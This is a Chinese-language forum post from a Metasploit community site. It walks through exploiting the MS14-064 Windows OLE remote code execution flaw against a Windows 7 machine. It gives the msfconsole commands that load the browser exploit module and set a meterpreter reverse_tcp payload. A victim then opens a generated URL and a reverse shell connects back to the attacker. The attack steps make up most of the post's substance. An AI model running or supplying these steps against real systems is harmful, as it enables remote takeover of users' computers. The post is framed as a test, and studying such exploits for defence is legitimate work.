Metasploit渗透测试论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

安络长矛深度安全检测系统
Metascan metasploit pro
查看: 1023|回复: 0

MS14-064 漏洞测试入侵win7

[复制链接]

0

主题

0

好友

114

积分

正式会员

Rank: 2

发表于 2017-2-12 00:32:05 |显示全部楼层
本帖最后由 sky2016a 于 2017-2-12 00:34 编辑

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,
远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...
metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution
执行命令:
msfconsole    //启动MSF
search ms14   //搜索关键字
use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块
set payload windows/meterpreter/reverse_tcp    //设置反弹连接shell
如图:
需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell,
所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,
所以我们这里测试受害的机器为windows7 32位.
按照图中各个属性配置好后 执行exploit即可
得到一个URL地址,复制到受害者机器(win7)测试
当用户点击允许了后
可以看见这边反弹了一个shell,接下里我们就可以随便玩了,
测试成功,结束。

技术宅的路上少不了苦逼和孤独,但那又怎样,哪怕成不了大神,也要码的漂亮。
                                                                                                                                本文出自:http://www.metasploit.cn/


如文中未特别声明转载请注明出自:http://www.metasploit.cn/
*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

QQ|Archiver|手机版|Metasploit ( 粤ICP备15008156号-1 )

GMT+8, 2017-5-26 03:56 , Processed in 0.297010 second(s), 28 queries .

Powered by Discuz! X2.5

© 2001-2012 Comsenz Inc.

回顶部